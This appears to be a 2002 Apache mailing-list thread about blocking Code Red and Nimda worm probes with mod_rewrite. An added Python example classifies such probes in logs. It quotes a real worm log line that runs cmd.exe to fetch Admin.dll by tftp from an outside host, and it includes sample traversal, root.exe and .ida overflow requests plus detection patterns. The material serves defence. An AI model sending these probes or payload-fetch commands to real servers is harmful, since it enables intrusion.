RewriteCond %{REQUEST_FILENAME} \.com.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.exe.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.dll.+$ [NC]
RewriteRule ^.*$ http://insecurity.org/403.shtml [L]

Which apparently works, but it seems that this typical section of 
the CR2 request:  /..%252f../  as denoted within -
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"

is somehow causing the match to fail.


		Any thoughts?
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...
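As an added worked example (Python, written for this page; not code from the thread, from Bill, or from the Apache project), the following takes the URI list from Erwien's SetEnvIf/Redirect block and the two RewriteCond spellings from the message above and runs them over constructed access_log and error_log lines. The sample lines are constructed to mirror the shapes quoted in the thread and use RFC 5737 placeholder addresses; the error_log part assumes a DocumentRoot of /var/www/html, as in AJ's post. It also shows what %{REQUEST_FILENAME} actually contains: no query string, percent-decoded once, so for `cmd.exe?/c+dir` the regex sees a path that ends in `.exe`, and `\.exe.+$` (at least one character after the extension) cannot match, while `\.exe.*$` does; the `%252f` sequence is not what makes the difference.

```python
"""Classify IIS-worm probes (Nimda / Code Red) in Apache access and error logs.

Added example, not code from the thread. Sample lines are constructed to mirror
the shapes quoted in the thread, with RFC 5737 placeholder addresses.
"""
import re
from urllib.parse import unquote

# Common/combined log prefix: client ident user [time] "method path proto" status bytes
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3}) (?P<bytes>\S+)'
)
# error_log line Apache writes when the probed file is missing under DocumentRoot
ERROR_RE = re.compile(
    r'^\[[^\]]+\] \[error\] \[client (?P<client>\S+)\] File does not exist: (?P<file>\S+)$'
)

# Paths from the thread's SetEnvIf/Redirect list, split by worm family:
# /default.ida is the Code Red target (.ida ISAPI overflow); the others are
# the traversal / root.exe / cmd.exe probes Nimda sends.
CODE_RED_PREFIX = "/default.ida"
NIMDA_PREFIXES = ("/scripts/", "/msadc/", "/_vti_bin/", "/_mem_bin/", "/c/winnt/", "/d/winnt/")
NIMDA_TARGETS = ("cmd.exe", "root.exe", "admin.dll")

# The two RewriteCond spellings from the thread, each collapsed into one regex.
# ".+$" demands at least one character after the extension; ".*$" does not.
SUFFIX_DOT_PLUS = re.compile(r"\.(ida|com|exe|dll).+$", re.I)
SUFFIX_DOT_STAR = re.compile(r"\.(ida|com|exe|dll).*$", re.I)


def request_filename(request_path):
    """The string %{REQUEST_FILENAME}/%{REQUEST_URI} is matched against: the
    query string is gone and %xx is decoded once, so Nimda's %252f becomes a
    literal %2f rather than a second slash."""
    return unquote(request_path.split("?", 1)[0])


def classify(request_path):
    """Return 'code-red', 'nimda', or None for one request path."""
    path = request_filename(request_path).lower()
    if path.startswith(CODE_RED_PREFIX):
        return "code-red"
    if path.startswith(NIMDA_PREFIXES) and (".." in path or path.endswith(NIMDA_TARGETS)):
        return "nimda"
    return None


def rewrite_cond_check(request_path):
    """Emulate both RewriteCond variants on the query-less decoded path.
    Returns (matches with '.+$', matches with '.*$')."""
    fname = request_filename(request_path)
    return bool(SUFFIX_DOT_PLUS.search(fname)), bool(SUFFIX_DOT_STAR.search(fname))


def parse_access_line(line):
    """Parse one access_log line into a dict, or None if it is not one."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_error_line(line, docroot="/var/www/html"):
    """Classify a 'File does not exist' error_log line; DocumentRoot is assumed
    to be /var/www/html as in the thread (pass your own if it differs)."""
    m = ERROR_RE.match(line)
    if not m or not m.group("file").startswith(docroot):
        return None
    return classify(m.group("file")[len(docroot):])


def scan(log_text):
    """Return {label: [client, ...]} for every worm probe in an access log."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if rec is None:
            continue
        label = classify(rec["path"])
        if label:
            hits.setdefault(label, []).append(rec["client"])
    return hits


# Constructed sample, not a real capture; request shapes follow the thread.
SAMPLE_ACCESS_LOG = """\
198.51.100.23 - - [05/Feb/2002:02:59:08 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
198.51.100.23 - - [05/Feb/2002:02:59:09 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
198.51.100.23 - - [05/Feb/2002:02:59:10 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
198.51.100.23 - - [05/Feb/2002:02:59:11 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 404 302 "-" "-"
198.51.100.7 - - [11/Feb/2002:20:30:11 -0500] "GET /default.ida?NNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 302 "-" "-"
203.0.113.9 - - [11/Feb/2002:20:31:00 -0500] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for label, clients in sorted(scan(SAMPLE_ACCESS_LOG).items()):
        print(f"{label}: {len(clients)} probe(s) from {sorted(set(clients))}")
    for p in ("/default.ida?NNNN", "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"):
        print(p, "-> RewriteCond .+$ / .*$ ->", rewrite_cond_check(p))
```

The classifier is deliberately narrower than the blanket `^/scripts/` rule in the thread: a prefix alone would also tag a site's own /scripts/site.js, so it additionally requires a `..` traversal or one of the executables the worms ask for. Feed it the real access_log with `scan(open("access_log").read())`; the error_log helper exists because, as AJ's post shows, a 404 for a worm probe lands there as "File does not exist" with the path already decoded and prefixed by DocumentRoot.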




Re: Code Red 2 attack

Posted by Bill -OSX- Jones <sn...@mac.com>.
um, no ... Are you on Windows?

On Thursday, February 28, 2002, at 05:39  PM, Eduardo Gomez wrote:
>
> Does this mean someone may have successfully hacked me through this
> malformed header attack?
> Is it normal to find so much binary code in the error log?
>

		???
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...

